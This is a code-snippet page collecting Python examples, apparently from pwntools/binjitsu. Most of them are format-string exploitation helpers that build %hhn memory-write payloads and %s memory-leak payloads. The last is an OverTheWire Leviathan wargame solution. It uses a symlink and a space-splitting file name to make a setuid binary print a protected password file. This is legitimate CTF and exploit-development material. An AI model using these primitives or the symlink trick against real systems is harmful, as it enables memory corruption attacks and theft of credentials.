示例#1
 def qrcode_check(self):
     """Round-trip a random string through qrencode and qrdecode.

     A random text of 10-40 characters is encoded with translate('qrencode'),
     the result is wrapped with a randomly picked transport encoding ('b64'
     or 'hex') by _encode(), and then decoded with translate('qrdecode').

     Returns:
         True when the decoded text equals the original; otherwise the
         mismatch is reported through check_fail() and False is returned.
     """
     original = randoms(random.randint(10, 40))
     log.info('qrencode %s', original)
     image = self.translate('qrencode', original)
     transport = random.choice(['b64', 'hex'])
     log.info('qrdecode (%s)', transport)
     decoded = self.translate('qrdecode', _encode(image, transport), transport)
     if original == decoded:
         return True
     self.check_fail('%s not matched %s' % (original, decoded))
     return False
示例#2
    def execute_writes(self):
        """execute_writes() -> None

        Builds the payload for the pending writes and sends it to the
        target through execute_fmt(); the pending-writes dict is reset
        afterwards. The random ASCII-letter padding of self.padlen bytes
        is reported to fmtstr_payload() as bytes already written.

        Returns:
            None
        """
        padding = randoms(self.padlen, string.ascii_letters.encode("utf8"))
        payload = fmtstr_payload(
            self.offset,
            self.writes,
            numbwritten=self.padlen,
            write_size="byte",
        )
        self.execute_fmt(padding + payload)
        self.writes = {}
示例#3
文件: fmtstr.py 项目: thetlk/binjitsu
    def execute_writes(self):
        """execute_writes() -> None

        Builds the payload for the pending writes and sends it to the
        target through execute_fmt(); the pending-writes dict is reset
        afterwards. The random padding of self.padlen characters is
        reported to fmtstr_payload() as characters already written.

        Returns:
            None

        """
        padding = randoms(self.padlen)
        payload = fmtstr_payload(
            self.offset,
            self.writes,
            numbwritten=self.padlen,
            write_size='byte',
        )
        self.execute_fmt(padding + payload)
        self.writes = {}
示例#4
    def execute_writes(self):
        """execute_writes() -> None

        Builds the payload for the pending writes and sends it to the
        target through execute_fmt(); the pending-writes dict is reset
        afterwards. Unlike the padding-only variants, the count passed as
        ``numbwritten`` also includes self.numbwritten, i.e. output that
        precedes this payload.

        Returns:
            None

        """
        padding = randoms(self.padlen).encode()
        already_written = self.padlen + self.numbwritten
        payload = fmtstr_payload(
            self.offset,
            self.writes,
            numbwritten=already_written,
            write_size='byte',
        )
        self.execute_fmt(padding + payload)
        self.writes = {}
示例#5
文件: fmtstr.py 项目: thetlk/binjitsu
    def _leaker(self, addr):
        """Leak the data at *addr* via a ``%N$s`` directive.

        The packed address is placed after the random padding and a
        START/END-delimited ``%s`` directive at self.offset; whatever the
        target prints between the markers is returned with a trailing NUL.
        """
        # Hack: ELF headers usually sit at offset 0 of a page, addresses
        # containing null bytes often cannot be leaked, and the page below
        # the header is often unmapped. So when addr is page-aligned and the
        # next three bytes read "ELF", report "\x7f" instead of leaking it
        # (unless it is leaked by some other path).
        page_aligned = (addr & 0xfff) == 0
        if page_aligned and self.leaker._leak(addr+1, 3, False) == "ELF":
            return "\x7f"

        marker = "START%%%d$sEND" % self.offset
        payload = randoms(self.padlen) + pack(addr) + marker

        output = self.execute_fmt(payload)
        # Take the first START...END span; DOTALL lets it cross newlines.
        leaked = re.findall(r"START(.*)END", output, re.MULTILINE | re.DOTALL)[0]
        return leaked + "\x00"
示例#6
    def _leaker(self, addr):
        """Leak the bytes at *addr* via a ``%N$s`` directive.

        The packed address is placed after the random padding and a
        START/END-delimited ``%s`` directive at self.offset; whatever the
        target prints between the markers is returned with a trailing NUL.
        """
        # Hack: ELF headers usually sit at offset 0 of a page, addresses
        # containing null bytes often cannot be leaked, and the page below
        # the header is often unmapped. So when addr is page-aligned and the
        # next three bytes read b"ELF", report b"\x7f" instead of leaking it
        # (unless it is leaked by some other path).
        page_aligned = (addr & 0xfff) == 0
        if page_aligned and self.leaker._leak(addr+1, 3, False) == b"ELF":
            return b"\x7f"

        marker = b"START%%%d$sEND" % self.offset
        payload = randoms(self.padlen).encode() + pack(addr) + marker

        output = self.execute_fmt(payload)
        # Take the first START...END span; DOTALL lets it cross newlines.
        leaked = re.findall(br"START(.*)END", output, re.MULTILINE | re.DOTALL)[0]
        return leaked + b"\x00"
示例#7
    def _leaker(self, addr):
        """Leak the bytes at *addr* via a ``%N$s`` directive.

        The packed address is placed after random ASCII-letter padding and a
        START/END-delimited ``%s`` directive at self.offset; whatever the
        target prints between the markers is returned with a trailing NUL.
        """
        # Hack: ELF headers usually sit at offset 0 of a page, addresses
        # containing null bytes often cannot be leaked, and the page below
        # the header is often unmapped. So when addr is page-aligned and the
        # next three bytes read b"ELF", report b"\x7f" instead of leaking it
        # (unless it is leaked by some other path).
        page_aligned = (addr & 0xFFF) == 0
        if page_aligned and self.leaker._leak(addr + 1, 3, False) == b"ELF":
            return b"\x7f"

        marker = "START%{}$sEND".format(self.offset).encode("utf8")
        payload = b"".join([
            randoms(self.padlen, string.ascii_letters.encode("utf8")),
            pack(addr),
            marker,
        ])

        output = self.execute_fmt(payload)
        # Take the first START...END span; DOTALL lets it cross newlines.
        leaked = re.findall(b"START(.*)END", output, re.MULTILINE | re.DOTALL)[0]
        return leaked + b"\x00"
示例#8
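    def execute_writes(self):
        """Flush the pending writes to the target as a single format string.

        Every (addr, data) pair in ``self.writes`` is split into one-byte
        writes. The target addresses follow the random padding, and one
        ``%<count>c%<index>$hhn`` directive per byte advances the running
        output count to the wanted value. The payload is sent with
        execute_fmt() and the pending-write list is cleared.

        Returns:
            None
        """
        addrs = []
        byte_values = []  # was named ``bytes``, which shadowed the builtin

        # Convert every write into single-byte writes.
        for addr, data in self.writes:
            data = flat(data)
            for off, b in enumerate(data):
                addrs.append(addr + off)
                byte_values.append(u8(b))

        fmtstr = randoms(self.padlen) + flat(addrs)
        # Output produced so far: whatever preceded this payload plus the
        # prefix just built.
        n = self.numbwritten + len(fmtstr)

        for i, b in enumerate(byte_values):
            # Extra characters needed to bring the low byte of the count to
            # b; a zero or negative delta wraps around by a full 256.
            b -= (n % 256)
            if b <= 0:
                b += 256
            fmtstr += "%%%dc%%%d$hhn" % (b, self.offset + i)
            n += b

        self.execute_fmt(fmtstr)
        self.writes = []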
示例#9
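    def execute_writes(self):
        """Flush the pending writes to the target as a single format string.

        Every (addr, data) pair in ``self.writes`` is split into one-byte
        writes. The target addresses follow the random padding, and one
        ``%<count>c%<index>$hhn`` directive per byte advances the running
        output count to the wanted value. The payload is sent with
        execute_fmt() and the pending-write list is cleared.

        Returns:
            None
        """
        addrs = []
        byte_values = []  # was named ``bytes``, which shadowed the builtin

        # Convert every write into single-byte writes.
        for addr, data in self.writes:
            data = flat(data)
            for off, b in enumerate(data):
                addrs.append(addr+off)
                byte_values.append(u8(b))

        fmtstr = randoms(self.padlen) + flat(addrs)
        # Output produced so far: whatever preceded this payload plus the
        # prefix just built.
        n = self.numbwritten + len(fmtstr)

        for i, b in enumerate(byte_values):
            # Extra characters needed to bring the low byte of the count to
            # b; a zero or negative delta wraps around by a full 256.
            b -= (n % 256)
            if b <= 0:
                b += 256
            fmtstr += "%%%dc%%%d$hhn" % (b, self.offset + i)
            n += b

        self.execute_fmt(fmtstr)
        self.writes = []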
示例#10
from pwn import *
from pygments import highlight
from pygments.lexers import CLexer
from pygments.formatters import TerminalFormatter
from pwnlib.util.fiddling import randoms
from time import sleep

level = 2
# NOTE(review): credentials are redacted on this page. As printed,
# '******' % level raises TypeError (no format placeholder); the original
# presumably had a placeholder such as '%d' — confirm against the source.
user = '******' % level
host = 'leviathan.labs.overthewire.org'
password = '******'
port = 2223


def connectToLevel():
    """Open an SSH session to the wargame host for the configured level.

    Uses the module-level user/host/port/password values.
    """
    return ssh(user=user, host=host, port=port, password=password)


context(arch='i386', os='linux')

# Base folder for unpack
# NOTE(review): randoms() is pwnlib's convenience generator, not `secrets`;
# a scratch directory name under the shared /tmp is therefore guessable.
# Fine if avoiding name collisions is the only concern — confirm.
UNPACK_FOLDER = '/tmp/%s' % randoms(10)

sh = connectToLevel()
# Spawn a remote shell with an empty PS1, presumably so no prompt text
# ends up in the output read back below.
sh = sh.process('/bin/sh', env={'PS1': ''})
sh.sendline('mkdir -p %s' % UNPACK_FOLDER)
sh.sendline('cd %s' % UNPACK_FOLDER)
sh.sendline('ln -s /etc/leviathan_pass/leviathan3 leviathan3')
sh.sendline('touch "tmp leviathan3"')
sh.sendline('/home/leviathan2/printfile "tmp leviathan3" 2>/dev/null')
# Only a single line of output is read back and logged.
log.info('Flag = %s' % sh.recvline())